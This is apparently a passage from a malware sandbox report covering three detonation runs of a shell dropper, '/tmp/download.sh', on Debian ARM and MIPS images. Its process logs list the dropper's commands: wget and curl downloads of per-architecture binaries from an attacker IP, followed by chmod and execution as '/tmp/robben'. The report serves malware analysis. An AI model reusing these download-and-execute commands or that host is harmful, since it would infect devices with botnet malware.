US 8.8.8.8:53 se.archive.ubuntu.com udp (2 occurrences)
GB 185.125.190.82:80 security.ubuntu.com tcp
SE 194.71.11.165:80 se.archive.ubuntu.com tcp

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-22 21:53

Reported

2024-08-23 00:31

Platform

debian12-armhf-20240418-en

Max time kernel

78s

Max time network

584s

Command Line

[/tmp/download.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A (11 occurrences)

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A (11 occurrences)

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/download.sh N/A

Processes

/tmp/download.sh

[/tmp/download.sh]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/x86_64]

/usr/bin/cat

[cat x86_64]

/usr/bin/chmod

[chmod +x download.sh robben systemd-private-458179b96d564bf6b593c47227ffd8bc-ntpsec.service-iJh5rL systemd-private-458179b96d564bf6b593c47227ffd8bc-systemd-logind.service-OhJ67W systemd-private-458179b96d564bf6b593c47227ffd8bc-systemd-timedated.service-ocZ6ND]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mips]

/usr/bin/cat

[cat mips]

/usr/bin/chmod

[chmod +x download.sh robben systemd-private-458179b96d564bf6b593c47227ffd8bc-ntpsec.service-iJh5rL systemd-private-458179b96d564bf6b593c47227ffd8bc-systemd-logind.service-OhJ67W]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mipsel]

/usr/bin/cat

[cat mipsel]

/usr/bin/chmod

[chmod +x download.sh robben systemd-private-458179b96d564bf6b593c47227ffd8bc-ntpsec.service-iJh5rL systemd-private-458179b96d564bf6b593c47227ffd8bc-systemd-logind.service-OhJ67W]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm]

/usr/bin/cat

[cat arm]

/usr/bin/chmod

[chmod +x download.sh robben systemd-private-458179b96d564bf6b593c47227ffd8bc-ntpsec.service-iJh5rL systemd-private-458179b96d564bf6b593c47227ffd8bc-systemd-logind.service-OhJ67W]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm5]

/usr/bin/cat

[cat arm5]

/usr/bin/chmod

[chmod +x download.sh robben systemd-private-458179b96d564bf6b593c47227ffd8bc-ntpsec.service-iJh5rL systemd-private-458179b96d564bf6b593c47227ffd8bc-systemd-logind.service-OhJ67W]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm6]

/usr/bin/cat

[cat arm6]

/usr/bin/chmod

[chmod +x download.sh robben systemd-private-458179b96d564bf6b593c47227ffd8bc-ntpsec.service-iJh5rL systemd-private-458179b96d564bf6b593c47227ffd8bc-systemd-logind.service-OhJ67W]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm7]

/usr/bin/cat

[cat arm7]

/usr/bin/chmod

[chmod +x download.sh robben systemd-private-458179b96d564bf6b593c47227ffd8bc-ntpsec.service-iJh5rL systemd-private-458179b96d564bf6b593c47227ffd8bc-systemd-logind.service-OhJ67W]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/spc]

/usr/bin/cat

[cat spc]

/usr/bin/chmod

[chmod +x download.sh robben systemd-private-458179b96d564bf6b593c47227ffd8bc-ntpsec.service-iJh5rL systemd-private-458179b96d564bf6b593c47227ffd8bc-systemd-logind.service-OhJ67W]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/sh4]

/usr/bin/cat

[cat sh4]

/usr/bin/chmod

[chmod +x download.sh robben systemd-private-458179b96d564bf6b593c47227ffd8bc-ntpsec.service-iJh5rL systemd-private-458179b96d564bf6b593c47227ffd8bc-systemd-logind.service-OhJ67W]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i586]

/usr/bin/cat

[cat i586]

/usr/bin/chmod

[chmod +x download.sh robben systemd-private-458179b96d564bf6b593c47227ffd8bc-ntpsec.service-iJh5rL systemd-private-458179b96d564bf6b593c47227ffd8bc-systemd-logind.service-OhJ67W]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i686]

/usr/bin/cat

[cat i686]

/usr/bin/chmod

[chmod +x download.sh robben systemd-private-458179b96d564bf6b593c47227ffd8bc-ntpsec.service-iJh5rL systemd-private-458179b96d564bf6b593c47227ffd8bc-systemd-logind.service-OhJ67W]

/tmp/robben

[./robben Payload]

Network

Country Destination Domain Proto
US 158.51.127.106:80 tcp (11 occurrences)
US 1.1.1.1:53 debian12-armhf-20240418-en-4 udp (4 occurrences)
US 1.1.1.1:53 0.debian.pool.ntp.org udp

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-08-22 21:53

Reported

2024-08-23 00:53

Platform

debian9-mipsbe-20240611-en

Max time kernel

86s

Max time network

114s

Command Line

[/tmp/download.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A (11 occurrences)

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A (11 occurrences)

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/download.sh N/A

Processes

/tmp/download.sh

[/tmp/download.sh]

/usr/bin/wget

[wget http://158.51.127.106/bins/x86_64]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/x86_64]

/bin/cat

[cat x86_64]

/bin/chmod

[chmod +x download.sh robben systemd-private-dcc3d7e240784f46a17905593cd82390-systemd-timedated.service-KgbMrj]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mips]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mips]

/bin/cat

[cat mips]

/bin/chmod

[chmod +x download.sh robben systemd-private-dcc3d7e240784f46a17905593cd82390-systemd-timedated.service-KgbMrj]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mipsel]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mipsel]

/bin/cat

[cat mipsel]

/bin/chmod

[chmod +x download.sh robben systemd-private-dcc3d7e240784f46a17905593cd82390-systemd-timedated.service-KgbMrj]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm]

/bin/cat

[cat arm]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm5]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm5]

/bin/cat

[cat arm5]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm6]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm6]

/bin/cat

[cat arm6]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm7]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm7]

/bin/cat

[cat arm7]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/spc]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/spc]

/bin/cat

[cat spc]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/sh4]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/sh4]

/bin/cat

[cat sh4]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/i586]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i586]

/bin/cat

[cat i586]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/i686]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i686]

/bin/cat

[cat i686]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

Network

Country Destination Domain Proto
US 158.51.127.106:80 tcp (22 identical rows)

Files

N/A

Analysis: behavioral5

Detonation Overview

Submitted

2024-08-22 21:53

Reported

2024-08-23 00:55

Platform

debian9-mipsel-20240226-en

Max time kernel

286s

Max time network

315s

Command Line

[/tmp/download.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A (11 identical rows)

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A (11 identical rows)

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/download.sh N/A

Processes

/tmp/download.sh

[/tmp/download.sh]

/usr/bin/wget

[wget http://158.51.127.106/bins/x86_64]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/x86_64]

/bin/cat

[cat x86_64]

/bin/chmod

[chmod +x download.sh robben systemd-private-6959615890b94d28b77e9e6230635170-systemd-timedated.service-VwZarq]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mips]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mips]

/bin/cat

[cat mips]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mipsel]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mipsel]

/bin/cat

[cat mipsel]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm]

/bin/cat

[cat arm]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm5]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm5]

/bin/cat

[cat arm5]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm6]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm6]

/bin/cat

[cat arm6]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm7]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm7]

/bin/cat

[cat arm7]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/spc]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/spc]

/bin/cat

[cat spc]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/sh4]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/sh4]

/bin/cat

[cat sh4]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/i586]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i586]

/bin/cat

[cat i586]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/i686]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i686]

/bin/cat

[cat i686]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

Network

Country Destination Domain Proto
US 158.51.127.106:80 tcp (22 identical rows)

Files

N/A